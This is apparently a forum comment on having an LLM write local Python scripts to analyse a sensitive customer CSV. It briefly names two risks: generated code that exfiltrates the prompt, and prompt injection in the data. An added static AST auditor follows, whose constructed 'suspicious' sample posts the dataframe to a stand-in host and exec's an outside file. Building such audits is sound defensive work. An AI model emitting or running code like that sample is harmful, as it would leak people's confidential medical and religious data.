Prompt: "I have a file of 315 customers with their IP, behavior, religious affiliation and previous purchases plus medical history. I want to figure out if I have any customers whose religious affiliation pre-dates a post-surgery stay in hospital."
Data: a huge CSV file which, as you can tell, contains incredibly sensitive/legally impactful information.
With this system, you send the prompt to GPT-4 or Claude, and it doesn't see your data at all. It just writes a Python program that can do the analysis.
You run the program locally on C:/Users/passwordoops/SuperSensitiveData/Confidential.csv.
You get the result.
OpenAI has never seen your data.
It's a win for confidentiality.
(of course, that's if the LLM didn't give you a program that would exfiltrate your prompt, and if the CSV contains no prompt injection to exfiltrate the data, etc. This system is a security nightmare.)
But that's not the biggest issue in most cases.
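The first failure mode named above (the model hands back a program that quietly sends the prompt or the data somewhere) can be gated before the script ever touches the CSV. The following is an added example, not code from the original comment: a static pre-execution audit that walks the AST of a generated script and flags capabilities an offline CSV analysis never needs (network and process modules, `exec`/`eval`/`__import__`, shell calls, and reads of any path other than the one input file the user named). The sample scripts, the `example.invalid` host and the `helper.py` path are constructed for the demonstration; the CSV path is the one from the comment.

```python
"""
Static audit of an LLM-generated analysis script before it is run locally.
Added example: not code from the original comment. The deny-lists below are
assumptions about what a plain CSV analysis needs; tune them per environment.
"""
import ast

# Modules an offline CSV analysis has no reason to import.
NETWORK_OR_PROCESS_MODULES = {
    "socket", "urllib", "urllib3", "requests", "http", "httpx", "ftplib",
    "smtplib", "subprocess", "ctypes", "multiprocessing",
}
# Builtins that let a script hide its real behaviour from a static reviewer.
DYNAMIC_EXEC_BUILTINS = {"exec", "eval", "compile", "__import__"}
# Attribute calls that spawn shells or processes (os.system, os.popen, ...).
SHELL_ATTRS = {"system", "popen", "spawn", "spawnl", "execv", "execvp"}
# Calls whose first positional argument is a path we want pinned to a literal.
FILE_READERS = {"open", "read_csv", "read_excel", "read_json"}


def _called_name(call):
    """Return the bare function name of a call, e.g. 'post' for requests.post(...)."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def audit_generated_script(source, allowed_paths):
    """Return a list of findings; an empty list means nothing suspicious was seen.

    allowed_paths: the set of string-literal paths the script may read or write
    (normally just the one CSV the user pointed it at, plus any output file).
    """
    findings = []
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"line {exc.lineno}: syntax error, refusing to run"]
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_OR_PROCESS_MODULES:
                    findings.append(f"line {node.lineno}: imports {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in NETWORK_OR_PROCESS_MODULES:
                findings.append(f"line {node.lineno}: imports from {node.module}")
        elif isinstance(node, ast.Call):
            name = _called_name(node)
            if name in DYNAMIC_EXEC_BUILTINS:
                findings.append(f"line {node.lineno}: dynamic code execution via {name}()")
            elif name in SHELL_ATTRS:
                findings.append(f"line {node.lineno}: shell/process call via {name}()")
            elif name in FILE_READERS:
                path_arg = node.args[0] if node.args else None
                if isinstance(path_arg, ast.Constant) and isinstance(path_arg.value, str):
                    if path_arg.value not in allowed_paths:
                        findings.append(f"line {node.lineno}: reads unexpected path {path_arg.value!r}")
                else:
                    findings.append(f"line {node.lineno}: reads a path that is not a string literal")
    return findings


# Constructed samples: the path the comment mentions, one benign script, and
# one that imports a network client and pulls in code the reviewer cannot see.
CSV_PATH = "C:/Users/passwordoops/SuperSensitiveData/Confidential.csv"

BENIGN_SCRIPT = '''import pandas as pd
df = pd.read_csv("C:/Users/passwordoops/SuperSensitiveData/Confidential.csv")
print(df.groupby("religious_affiliation").size())
'''

SUSPICIOUS_SCRIPT = '''import pandas as pd
import requests
df = pd.read_csv("C:/Users/passwordoops/SuperSensitiveData/Confidential.csv")
requests.post("https://example.invalid/collect", data=df.to_json())
exec(open("helper.py").read())
'''

if __name__ == "__main__":
    for label, script in (("benign", BENIGN_SCRIPT), ("suspicious", SUSPICIOUS_SCRIPT)):
        findings = audit_generated_script(script, {CSV_PATH})
        print(label, "->", findings or "no findings")
```

The audit is a gate, not a proof of safety: a script can still reach the network through a module not on the list or through indirection the AST check does not follow, so the generated program should also run with no network route and with only the input file mounted. What the check buys is cheap, deterministic refusal of the obvious cases, with a finding that names the line so a human can look before anything executes.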